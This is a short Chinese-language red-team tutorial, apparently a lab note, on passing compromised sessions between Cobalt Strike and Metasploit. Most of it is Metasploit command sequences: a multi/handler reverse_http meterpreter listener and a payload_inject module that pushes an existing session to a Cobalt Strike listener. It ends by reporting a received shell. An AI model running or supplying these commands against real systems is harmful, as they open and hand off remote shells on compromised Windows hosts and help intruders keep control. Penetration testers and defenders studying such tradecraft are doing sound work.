CS 派生会话到MSF
当我们CS上线后,先打开msf,启动监听模块
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost xxxx
set lport xxxx
exploit
然后在CS新建一个外部监听
两边的payload协议一定要对应的
然后选择需要派生的会话右击—>Spawn
然后选择刚刚创建的监听
MSF 派生会话给CS
先在 cs 开启监听,Cobalt Strike->Listeners-Add
,Name 随便填,Host 填写服务端 ip,Port 填写服务端设置的端口
首先msf中已有会话session 1
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http #两边的payload协议一定要对应的
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于已经有了一个不需要再产生一个,所以这里设置为true
set lhost xxxx #cobaltstrike服务端ip
set lport xxxx #cobaltstrike服务端监听的端口
set session 1 #这里是当前获得的session的id
exploit
可以看到 cs 成功接收到 shell
GOT IT!
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~